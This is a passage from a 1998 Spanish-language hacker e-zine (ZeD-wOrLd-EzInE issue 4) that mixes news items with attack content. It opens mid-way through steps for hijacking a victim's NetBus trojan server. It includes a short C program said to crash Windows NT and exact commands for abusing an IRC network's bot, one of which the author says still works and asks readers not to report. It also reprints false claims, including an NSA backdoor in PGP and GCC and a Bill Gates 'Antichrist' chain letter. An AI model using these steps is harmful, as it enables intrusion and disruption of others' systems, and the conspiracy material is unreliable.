protected. " o si lo has hecho bien " Access; ". Si te da el error intentalo hasta que vaya bien y puedes desesperarte porque entonces serias un lamer de mucho cuidado (es dificil teclear eso, verdad??) 5.- Si te ha salido bien, pones " ServerPwd " (repito, si cambias las mayusculas o minusculas y no las pones tal cual estan aqui no funcionara!!!!) 6.- Al poner esto no dice nada, pero funciona, ahora cierras el prog. de telnet (si te da la gana) y conectas con el NetBus (cliente) a la IP del tio, veras que no pide password!!! luego ponselo tu para que ningun graciosillo entre y te heche.... ()------------() /\/\/\/\/\/\/\/\/\/\/\/\ <--> []KHAN[] <--> | khan@cyberaragon.com | ()------------() \/\/\/\/\/\/\/\/\/\/\/\/ [[[[[[[[[[[[[[[[[ZeD-wOrLd-EzInE numero 4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] <><><><><><><><><><><><><><><><><> <> NOTICIAS <> <><><><><><><><><><><><><><><><><> LAS PERSONAS QUE ESCRIBIERON ESTAS NOTICIAS,SON COMPLETAMENTE IMPARCIALES A LO HORA DE DARLAS,POR LO TANTO HAY QUE RESPETAR LAS POSIBLES OPINIONES DE LOS AUTORES DE LAS MISMAS. ********************************************************************************************** VIRUS "MONICA LEWINSKY". Un virus informatico dedicado a Monica Lewinsky Viernes 02 octubre 1998 Una sociedad especializada espanola anuncio el viernes el descubrimiento de un virus informatico de origen italiano dedicado a la ex becaria de la Casa Blanca Monica Lewinsky. MADRID, Oct 2 (AFP) - Segun la firma madrilena Panda Software, especializada en la seguridad informatica, el virus W97M/Lewinsky desactiva los sistemas de proteccion del programa de tratamiento de textos Microsoft Word, y puede destruir los ficheros de texto creados por el usuario. El virus activa, en el sistema de ayuda de Word, una ventana de dialogo en la que puede leerse: "Hello Bill, i am ready for a new blowjob" (Hola Bill, estoy lista para una nueva felacion). El virus modifica entonces las propiedades de los ficheros de texto abiertos en ese momento. Dicho virus, que se transmite al telecargar documentos de Internet o al recibir correos electronicos, corresponde a una nueva tendencia de los piratas informaticos consistente en asociar a sus fechorias temas de actualidad, anadio Panda Software. *********************************************************************************************** NUEVO BUG EN EL NETSCAPE. El nuevo 'bug' (que ha sido reconocido por Netscape) permite a un webmaster desaprensivo, escribir un peque±o 'script' que obtenga la lista completa de sitios web que el usuario ha visitado en el ·ltimo par de meses. De hecho, cualquier informaci≤n que a·n permanezca en la cachΘ del navegador (contrase±as, n·meros de tarjetas de crΘdito, etc...) podrφa ser obtenida de esta forma. El 'script' accede sin dificultad a la informaci≤n de la cachΘ (que el usuario puede ver tecleando "about:cache" o "about:global"), y la envφa al sitio web en cuesti≤n. Incluso las direcciones tecleadas en un motor de b·squeda son obtenidas mediante un formulario web estßndar y enviadas al sitio espφa. Incluso parece mßs que probable que el 'script' pueda actuar tambiΘn si llega incluido en un mensaje de correo, aunque esto no ha sido verificado a·n. Este 'bug' afecta a todas las versiones de Navigator hasta la 4.06, siempre que tengan activado el soporte JavaScript. Seg·n Netscape, el defecto serß corregido en la pr≤xima versi≤n 4.5 definitiva. El navegador de Microsoft no estß afectado por el bug. * http://www.wired.com/news/news/technology/story/15285.html * Toda la informaci≤n y pßgina de demostraci≤n: http://www.shout.net/~nothing/cache-cow/index.html *********************************************************************************************** INTEL INTERESADA POR LINUX Luego del anuncio de Microsoft en el sentido de que considera al sistema operativo Linux como parte de la competencia, la compa±φa Intel -el gigante de los microprocesadores-, ha anunciado que, a la par con Netscape, comprarß acciones en Red Hat Software, empresa que distribuye una versi≤n del sistema operativo Linux. Seg·n informamos en nuestra edici≤n de ayer, Linux fue creado por el finlandΘs Linus Torvalds, quien ha tenido un enorme Θxito con su sistema operativo gratuito, principalmente en ßmbitos acadΘmicos. Seg·n se indica, Linux tiene alrededor de 8 millones de usuarios a nivel mundial. Precisamente el hecho de que se trate de un programa gratuito, desarrollado por "artesanos" voluntarios y entusiastas, sin que tampoco sea propiedad o responsabilidad legal de empresa alguna, ha hecho que el sector corporativo lo haya descartado como posibilidad viable para sus sistemas informßticos. A ello se suma, evidentemente, el hecho de que no hay muchos programas dise±ados para tal plataforma. Sin embargo, varios expertos coinciden en que Linux es incluso mßs robusto que la alternativa de Microsoft, Windows NT. Tal hecho, sumado al interΘs de Netscape e Intel, podrφa resultar en que Linux quede ubicado, definitivamente, en la primera categorφa de los sistemas operativos, siendo posible entonces su explotaci≤n comercial. Volviendo a Intel; su adquisici≤n de acciones de Red Hat es interpretada como una importante declaraci≤n de apoyo al sistema. Sin embargo, pocos expertos consideran que el sistema operativo Windows NT estΘ realmente frente a una amenaza para su existencia (TI). *********************************************************************************************** SE VUELVE A REAFIRMAR QUE BILL GATES ES EL ANITICRISTO Aparte de todas las teorias que se avian sacado asta ahora (lo de pasar su nombre a ASCII y todo eso),vuelven a llover cosas sobre BILL GATES. Para aquellos de vosotros que tengßis Excel 95 (no el Excel de Office 97) probar esto: 1.Abre un nuevo fichero. 2.Posicionate en la fila 95. 3.Haz clic con el bot≤n n·mero 95, asφ la lφnea entera queda seleccionada. 4.Pulsa el tabulador, para moverte a la segunda columna. 5.Ahora, con el rat≤n selecciona en el men· Ayuda (┐) la entrada "Acerca de Microsoft Excel..." 6.Pulsas las teclas ctrl-alt-shift a la vez y con el rat≤n oprime el bot≤n "Soporte tΘcnico" 7.APARECERA UNA VENTANA, CON TITULO: THE HALL OF TORTURED SOULS. Esto es realmente espeluznante, de acuerdo. Es un programa similar al juego Doom, y se puede recorrer con los cursores. En las paredes aparecen los nombres en movimiento de las almas torturadas.... 8.AHORA DIRIGETE HACIA LAS ESCALERAS Y DATE LA VUELTA HACIA LA PARED QUE ESTARIA EN TU ESPALDA AL COMENZAR EL JUEGO. Es blanca y cuadriculada. Teclea EXCELKFA. Esto abre la pared y revela otro pasaje secreto. Introd·cete en el y procura no caerte del camino elevado (es difφcil pero intΘntalo de nuevo), cuando llegues al final, verßs algo realmente espeluznante. Hasta este punto, innumerables testigos en todo el mundo han verificado que esto es una verdadera revelaci≤n que te abre los ojos. Podrφa ser una broma de los programadores de Microsoft, o no?. No serφa sorprendente que Bill Gates fuera "El Anticristo", despuΘs de todo ya lo dice en la Biblia que alguien poderoso vendrß, y guiarß al mundo a la destrucci≤n. Y Bill Gates sin lugar a dudas tiene ese tipo de poder en sus manos. Mßs del 80% de los ordenadores del mundo tienen Windows y DOS (incluidos los del Pentßgono) Si todos esos productos tienen alg·n tipo de peque±o programa embebido (como este de "Hall of Tortured Souls") esto puede darle el control de configurar los arsenales nucleares, haciendo estragos en los sistemas de seguridad, y en los sistemas financieros del mundo, etc... Todo esto se puede hacer desde su sede y no estß lejos de la realidad! Solo usando Internet Explorer podemos permitirle espiar lo que tenemos en el ordenador bit a bit cada vez que nos conectamos. Quizßs el fin del mundo estß cerca y esto es solo la punta del Iceberg!? Cita de la Biblia: "Y el oblig≤ a todos, peque±os y grandes, ricos y pobres, libres y esclavos, a recibir una marca en su mano derecha o en su frente, de tal modo que nadie pudo comprar o vender sin la marca, que es el nombre de la bestia o el n·mero de su nombre. [...] Este n·mero es el 666" Apocalipsis 13:16-18. Mira ... Es algo sobre lo que debes pensar... Si la Biblia, en el libro del Apocalipsis dice que sin el signo de la bestia uno no podrφa ser capaz de comprar, vender, hacer transacciones comerciales, etc .... entonces .... Mi pregunta es: Es Internet hoy dφa una necesidad para hacer negocios? Hay que notar que Internet tambiΘn se conoce como la World Wide Web (tela de ara±a mundial) o WWW... Otra forma en que podemos escribir W es V/ (VI) asφ: WWW = VIVIVI ... 666 Esto me da que pensar... No va todo encaminado a introducirse en Internet? (por ejemplo comprar/vender bienes, transacciones comerciales) Y no estß Microsoft intentando siempre tener el monopolio de la tecnologφa sofware que toca, y ahora Internet? El Apocalipsis tambiΘn dice que la marca de la bestia se portara en la mano y en la frente de cada uno... Si Internet fuera en realidad el signo de la Bestia, no estamos empezando a llevarlo en nuestras manos (usando el rat≤n) y en nuestras frentes (pantalla)?. Finalmente, todo encaja o estamos dejßndonos llevar por la imaginaci≤n? Recuerda, el demonio viene a estafar, robar y destruir... asφ que estate VIGILANTE respecto a Bill Gates y Microsoft. "Estar o no estar de acuerdo con la WWW o la Bestia", esa no es la cuesti≤n. Y si WWW es el 666? O Bill Gates es la Bestia? Que harßs? Cancelar tu subscripci≤n a Internet? Renegar de Microsoft? Organizar una campa±a contra Bill Gates en Internet? Desconectar todos los Windows 95 para siempre? Eso no te harφa ning·n bien... piensa en ello y reza, reza en serio; bien... Nunca Dejes de Creer... Fin del mensaje. Tonterφas, verdad? Pues sepas que anoche se bloque≤ el ordenador al intentar mandar el mensaje y que hoy resulta que casualmente tu direcci≤n habφa cambiado. Acaso a alguien no le interesa que esta informaci≤n se difunda? *********************************************************************************************** CON UN SIMPLE PROGRAMA SE PUEDE RESETEAR EL WNT Testeado con SP4 RC. #include <windows.h> int WINAPI WinMain(HINSTANCE hinstExe, HINSTANCE hinstPrev, LPSTR lpszCmdLine, int nCmdShow) { HMENU hMenu =3D CreatePopupMenu(); HMENU hMenu1 =3D CreatePopupMenu(); AppendMenu(hMenu1,MF_STRING, 1, "1"); AppendMenu(hMenu1,MF_STRING, 2, "2"); AppendMenu(hMenu1,MF_STRING, 3, "3"); InsertMenu(hMenu,1,MF_POPUP|MF_STRING,(UINT)hMenu1,"1"); InsertMenu(hMenu,2,MF_POPUP|MF_STRING,(UINT)hMenu1,"2"); InsertMenu(hMenu,3,MF_POPUP|MF_STRING,(UINT)hMenu1,"3"); InsertMenu(hMenu,4,MF_POPUP|MF_STRING,(UINT)hMenu1,"4"); InsertMenu(hMenu,5,MF_POPUP|MF_STRING,(UINT)hMenu1,"5"); InsertMenu(hMenu,6,MF_POPUP|MF_STRING,(UINT)hMenu1,"6"); return 0; } *********************************************************************************************** EL HOMBRE SERA SUSTITUIDO POR MAQUINAS? Como dice la pregunta, acaso el Homo Sapiens sera sustituido por la maquina, que han ido progresando cada vez mas y mas, hasta el punto de poder imitar nuestros movimientos perfectamentes. Solamente sucistiran aquellos programadores y diseqadores de esta tecnologia revolucionaria, y que de nosotros los simples programadores de tiempo libre que solamente utilizamos la programacion de los diversos lenguajes actuales para entretenernos y matar el tiempo libre, que sera de este sentimiento y esta curiosidad del hombre. Y que de nosotros los hackers, acaso todo seran vigilados y nosotros no tedremos la oportunidad de hacer nada. O es que nos enfrentaremos a grandes computadoras, superinteligentes (de pelicula no!) con la capacidad de razonar y de tomar actos encontra de los hacker a la perfeccion sin ningun error, que pasa con el Administrador de Red. En conclusion, creo que todo esto es pura mierda, que actualmente ya va por una etapa, pero espero que en el futuro tomemos conciencia y no sustituyamos a la infinita sabiduria de la madre tierra, por una madre artificial Tierra, espero poder seguir sintiendo, lo que senti al escribir estas lineas Texto, en coclusion, despues de leer por quinta vez el Libro "Camino al futuro" por Bill Gates. Lo que hace el fastidio, aunque no es un mal libro *********************************************************************************************** DEVILIDAD EN LOS PASSWORDS DE RED EN W95 El otro dia lei un boletin de seguridad de microchof en el que se decia que habia un bug el los passwords de red del w95 (para variar), y bueno, el caso es que decia que estos pass se quedaban almacenados sin encriptar en la memoria del ordenador y que mirando con detalle cada sector de la misma, era posible sacarlos. *********************************************************************************************** PGP,ES O ERA SEGURO?? Mira por donde, pero la NSA puede romper la encriptaci≤n con PGP. ┐Para eso tanta tonterφa? Uno ya no puede estar seguro de que algo es seguro si no lo hace uno mismo. Mucha gente piensa que la encriptaci≤n de PGP es inviolable y que ni la NSA, el FBI, la CIA o MJ12 pueden leer su correo. Esto es falso y puede ser un error fatal. En Idaho, un activista de izquierda llamado Craig Steingold fue arrestado un dφa antes de que Θl y otros realizaran una protesta frente a un edificio gubernamental; la policia tenφa una copia del mensaje enviado por Steingold a otro activista, un mensaje que habφa sido encriptado con PGP y enviado por correo electr≤nico. Desde la versi≤n 2.1, PGP ("Pretty Good Privacy") ha sido forzado a permitir la fßcil decodificaci≤n de mensajes por parte de la NSA. En 1992, el autor, Pni1. Zimmerman, fue arrestado por agentes del gobierno, fue amenazado de ser acusado por trßfico de narc≤ticos si Θl no cooperaba. La exigencia de la NSA fue simple: Θl tenφa que poner una puerta trasera, virtualmente indetectable, dise±ada por la NSA, en todas las futuras versiones de PGP, y no decirle a nadie. DespuΘs de leer esto, estarßs pensando en usar una versi≤n previa de PGP, pero muchas de las versiones que actualmente se encuentran en BBSs y FTPs han sido modificadas. Solamente usa copias previas a 1992, y NO uses un compilador reciente, porque algunos de los compiladores mas populares han sido modificados para insertar la puerta trasera (consistente en unos cuantos cambios triviales) en cualquier versi≤n de PGP previa a la 2.1. Miembros de Novell, Microsoft, Borland, AT&T y otras compa±ias fueron persuadidos de hacer la modificaci≤n (cada una de estas compa±ias tienen al menos un miembro de la comisi≤n trilateral o del comitΘ Bilderberg). Fue mas difφcil el poder modificar GNU C, pero eventualmente lo hicieron, la FSF (Free Software Foundation fue amenazada con una investigaci≤n "IRS", en otras palabras, de ser forzados a declinar hasta que aceptaran. El resultado es que las versiones del GCC en sitios de FTP y todas las versiones superiores a la 2.2.3, contienen codigo para modificar PGP e insertar la puerta trasera. Recompilando GCC consigo mismo no ayuda; el c≤digo es insertado en el compilador en si. Recompilando con otro compilador puede ayudar, siempre que el compilador sea previo a 1992. *********************************************************************************************** BUGS DESCUBIERTOS EN EL Scytale DE IBERNET. el 1║ y mas peligroso lo han tapado. el 2║ hasta hace 2 semanas (que fue cuando lo provΘ la ultima vez) funciona, y anda trayendo a los cservices de cabeza pues oyen campanas y nbo saben donde. 1║ Desgraciadamente este bug se lo confesΘ a ---- hace + de medio a±o (todavφa me pregunto por que...) y es que era tan grave, como que podφas EJECUTAR comandos de IRCOP como si lo fueras de verdad. Y es que haciendo unas pruevas con el me di cuenta de que no tenφa limites, porque me entretube metiendo kills a unos graciosos que me havφan mosqueado, y a un IRCop de nv 800 y parece ser que... Este bug, permitφa tambien ejecutar cualquier comando en la maquina donde se corria scytale, sabiendo un poco de linux (para saber los parametros que hacen que se ejecuten cosas), ya que hice que scytale se saliera de ibernet 5 veces seguidas y se conectara a mi propio servidor de irc, con el comando server... El bug: /msg scytale RAW comando(de lo que quieras, ircop, ....), lo unico que no logrΘ hacer con ese bug es conseguir que scytale dijera cosas a los canales jeje, pero creo que si conseguφ que hiciera mensages a los ircops. ejem de un kill: msg scytale kill scytale te portaste mal y todo lo que sos ocurra. Lamentablemente como ya he dicho, este bug fuΘ parcheado despues de crear un caos durante un fφn de semana, ya que me dedicaba a marearlo, y resetearlo en cuanto alguien lo necesitaba... 2║ Este sigue Vigente!!!!!!!! Como cambiar los modos de un canal por el servidor (no por scytale) /msg scytale mode #canal +v-v+v-v+v-v+v-v+v-v+v-v+v-v+v-v+-modos (MINICK) (MINICK) (MINICK) (MINICK) (MINICK) (MINICK) (MINICK) (MINICK) (MINICK) (MINICK) (MINICK) (MINICK) (MINICK) (MINICK) (MINICK) (MINICK) parametros de modos. osea que si quieres poner el modo inte only, key con JJKK y limit a 10 y quitar la proteccion del topic para no ops para el canal #15a±eros (siempre que estoy en el irc estoy ahφ) seria: /msg scytale mode #15a±eros +v-v+v-v+v-v+v-v+v-v+v-v+v-v+v-v+ikl-t MINICK MINICK MINICK MINICK MINICK MINICK MINICK MINICK MINICK MINICK MINICK MINICK MINICK MINICK MINICK JJKK 10 y si tienes acceso en el canal para cambiar los modos saldrß un mensague parecido a este: ***sol.irc-hispano.org set mode +ikl-t JJKK 10 *** Y todo el canal mosqueado... Desgraciadamente este bug no deja controlar los bans ni ops del canal, ya que tiene un filtro para el 1║ parametro que si detecta una b o o salta y para el comdnado... Pero si quereis probar... Bueno eso es todo, y este bug no lo reporteis en el irc, que si no se acabarßm enterando los Ircops y ya veo a ---- cambiandolo todo. El 1║ bug no lo probeis en scytale2 cuando lo veaφs ya que un dφa le pille por banda y me puse a buscar bugs, y el jodido ---- se me pone ha hablar desde el scytale2 y me esp`lico que mira los logs, porque al estar haciendolo ... asi que usar soplo a scytale que a ese no lo testean. Y si os viene un ircop diciendo que que habeis hecho para que scutale ponga modos por el server, vosotros decir que es que scytale estß cansado de hacer todo el, pero que no sabeis nada... que logo lo tapan *********************************************************************************************** NUEVO VIRUS DE WEB. Se acaba de anunciar el descubrimiento de un nuevo virus basado en web que puede entrar en los ordenadores de los usuarios simplemente visitando una pagina web. El virus, denominado HTML.Internal por el distribuidor de antivirus que lo descubrio, no produce ningun dano, pero segun la empresa podria ocasionar algun problema. El peligro lo tienen principalmente los usuarios de Explorer e Internet Information Server, de Microsoft. Si se esta usando Netscape u otro navegador, no hay ningun peligro. La forma de contagio es visitando una pagina web con el virus en el servidor, el cual hace una llamada al lenguaje de scripts de Visual Basic para realizar una busqueda en los discos duros locales de archivos con extensiones .HTM o .HTML. Al cargar una pagina infectada, el mensaje superior es "HTML.Prepend /1nternal." La forma de evitar el contagio es manteniendo la seguridad de Internet Explorer al menos en nivel Medio, ya que avisara a los usuarios que HTML.Internal esta buscando en los discos duros. *********************************************************************************************** [[[[[[[[[[[[[[[[[ZeD-wOrLd-EzInE numero 4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] //////////////////////// ╢ despedida y cierre ╢ \\\\\\\\\\\\\\\\\\\\\\\\ Bueno pues esto toca a su fin,un numero mas,el cual espero os aya gustado y le saqueis todo el provecho posible,el numero 5 espero que este listo para despues de navidades (ultimos de enero o algo asi) osea que ya sabeis,si quereis colaborar con algun articulo hacedlo mandandomelo a esta direccion de e-mail: zed@mixmail.com diciendome vuestro e-mail,nick,direccion de web,si perteneceis a algun grupo....... en fin lo que se os ocurra byez.